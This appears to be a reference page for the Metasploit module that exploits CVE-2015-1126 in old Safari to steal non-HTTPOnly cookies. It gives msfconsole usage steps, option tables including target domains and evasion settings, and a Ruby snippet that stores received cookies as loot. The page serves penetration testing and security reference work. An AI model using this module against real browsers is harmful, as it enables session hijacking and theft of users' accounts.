Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft - Metasploit
This page contains detailed information about how to use the auxiliary/gather/apple_safari_ftp_url_cookie_theft metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft
Module: auxiliary/gather/apple_safari_ftp_url_cookie_theft
Source code: modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb
Disclosure date: 2015-04-08
Last modification time: 2021-02-08 14:51:58 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2015-1126
A vulnerability exists in versions of OSX, iOS, and Windows Safari released before April 8, 2015 that allows the non-HTTPOnly cookies of any domain to be stolen.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/gather/apple_safari_ftp_url_cookie_theft
msf auxiliary(apple_safari_ftp_url_cookie_theft) > show targets
... a list of targets ...
msf auxiliary(apple_safari_ftp_url_cookie_theft) > set TARGET target-id
msf auxiliary(apple_safari_ftp_url_cookie_theft) > show options
... show and set options ...
msf auxiliary(apple_safari_ftp_url_cookie_theft) > exploit
Go back to menu.
Msfconsole Usage
Here is how the gather/apple_safari_ftp_url_cookie_theft auxiliary module looks in the msfconsole:
msf6 > use auxiliary/gather/apple_safari_ftp_url_cookie_theft
msf6 auxiliary(gather/apple_safari_ftp_url_cookie_theft) > show info
Name: Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft
Module: auxiliary/gather/apple_safari_ftp_url_cookie_theft
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2015-04-08
Provided by:
Jouko Pynnonen
joev <[email protected]>
Available actions:
Name Description
---- -----------
WebServer Serve exploit via web server
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPPORT 8080 yes The HTTP server port
PASVPORT 0 no The local PASV data port to listen on (0 is random)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 5555 yes The local port to use for the FTP server
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGET_DOMAINS apple.com,example.com yes The comma-separated list of domains to steal non-HTTPOnly cookies from.
URIPATH no The URI to use for this exploit (default is random)
Description:
A vulnerability exists in versions of OSX, iOS, and Windows Safari
released before April 8, 2015 that allows the non-HTTPOnly cookies
of any domain to be stolen.
References:
https://nvd.nist.gov/vuln/detail/CVE-2015-1126
https://seclists.org/fulldisclosure/2015/Apr/30
Module Options
This is a complete list of options available in the gather/apple_safari_ftp_url_cookie_theft auxiliary module:
msf6 auxiliary(gather/apple_safari_ftp_url_cookie_theft) > show options
Module options (auxiliary/gather/apple_safari_ftp_url_cookie_theft):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPPORT 8080 yes The HTTP server port
PASVPORT 0 no The local PASV data port to listen on (0 is random)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 5555 yes The local port to use for the FTP server
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGET_DOMAINS apple.com,example.com yes The comma-separated list of domains to steal non-HTTPOnly cookies from.
URIPATH no The URI to use for this exploit (default is random)
Auxiliary action:
Name Description
---- -----------
WebServer Serve exploit via web server
Advanced Options
Here is a complete list of advanced options supported by the gather/apple_safari_ftp_url_cookie_theft auxiliary module:
msf6 auxiliary(gather/apple_safari_ftp_url_cookie_theft) > show advanced
Module advanced options (auxiliary/gather/apple_safari_ftp_url_cookie_theft):
Name Current Setting Required Description
---- --------------- -------- -----------
ListenerComm no The specific communication channel to use for this service
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the gather/apple_safari_ftp_url_cookie_theft module can do:
msf6 auxiliary(gather/apple_safari_ftp_url_cookie_theft) > show actions
Auxiliary actions:
Name Description
---- -----------
WebServer Serve exploit via web server
Evasion Options
Here is the full list of possible evasion options supported by the gather/apple_safari_ftp_url_cookie_theft auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(gather/apple_safari_ftp_url_cookie_theft) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
zlib support was not detected, yet the HTTP::compression option was set. Don't do that!
Here is a relevant code snippet related to the "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!" error message:
168: # exception is only raised if the DisableGzip advanced option has not been
169: # set.
170: #
171: def use_zlib
172: unless Rex::Text.zlib_present? || !datastore['HTTP::compression']
173: fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!")
174: end
175: end
176:
177:
178: #
<CLI.PEERHOST>: No cookies found for <DOMAIN>
Here is a relevant code snippet related to the "<CLI.PEERHOST>: No cookies found for <DOMAIN>" error message:
194: if request.method.downcase == 'post'
195: json = JSON.parse(request.body)
196: domain = json['domain']
197: cookie = Rex::Text.decode_base64(json['p']).to_s
198: if cookie.length == 0
199: print_error("#{cli.peerhost}: No cookies found for #{domain}")
200: else
201: file = store_loot(
202: "cookie_#{domain}", 'text/plain', cli.peerhost, cookie, 'cookie', 'Stolen cookies'
203: )
204: print_good("#{cli.peerhost}: Cookies stolen for #{domain} (#{cookie.bytes.length} bytes): ")
Go back to menu.
Related Pull Requests
- #14696 Merged Pull Request: Zeitwerk rex folder
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #13443 Merged Pull Request: Add descriptions to auxiliary modules Actions
- #10649 Merged Pull Request: Fix http://seclists.org links to https://
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #6644 Merged Pull Request: Preserve default types for datastore options
- #5312 Merged Pull Request: Various post-commit fixups
- #5192 Merged Pull Request: Add safari non-HTTPOnly cookie theft module
References
See Also
Check also the following modules related to this module:
- auxiliary/gather/apple_safari_webarchive_uxss
- auxiliary/admin/vxworks/apple_airport_extreme_password
- auxiliary/dos/apple_ios/webkit_backdrop_filter_blur
- exploit/apple_ios/browser/safari_jit
- exploit/apple_ios/browser/safari_libtiff
- exploit/apple_ios/browser/webkit_createthis
- exploit/apple_ios/browser/webkit_trident
- exploit/apple_ios/email/mobilemail_libtiff
- exploit/apple_ios/ssh/cydia_default_ssh
- exploit/windows/browser/apple_itunes_playlist
- exploit/windows/browser/apple_quicktime_marshaled_punk
- exploit/windows/browser/apple_quicktime_mime_type
- exploit/windows/browser/apple_quicktime_rdrf
- exploit/windows/browser/apple_quicktime_rtsp
- exploit/windows/browser/apple_quicktime_smil_debug
- exploit/windows/browser/apple_quicktime_texml_font_table
- exploit/windows/fileformat/apple_quicktime_pnsize
- exploit/windows/fileformat/apple_quicktime_rdrf
- exploit/windows/fileformat/apple_quicktime_texml
- exploit/windows/misc/apple_quicktime_rtsp_response
- payload/apple_ios/aarch64/meterpreter_reverse_http
- payload/apple_ios/aarch64/meterpreter_reverse_https
- payload/apple_ios/aarch64/meterpreter_reverse_tcp
- payload/apple_ios/aarch64/shell_reverse_tcp
- payload/apple_ios/armle/meterpreter_reverse_http
- payload/apple_ios/armle/meterpreter_reverse_https
- payload/apple_ios/armle/meterpreter_reverse_tcp
- post/apple_ios/gather/ios_image_gather
- post/apple_ios/gather/ios_text_gather
- post/multi/gather/apple_ios_backup
- auxiliary/admin/appletv/appletv_display_image
- auxiliary/admin/appletv/appletv_display_video
- auxiliary/scanner/http/appletv_login
Authors
- Jouko Pynnonen
- joev
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.
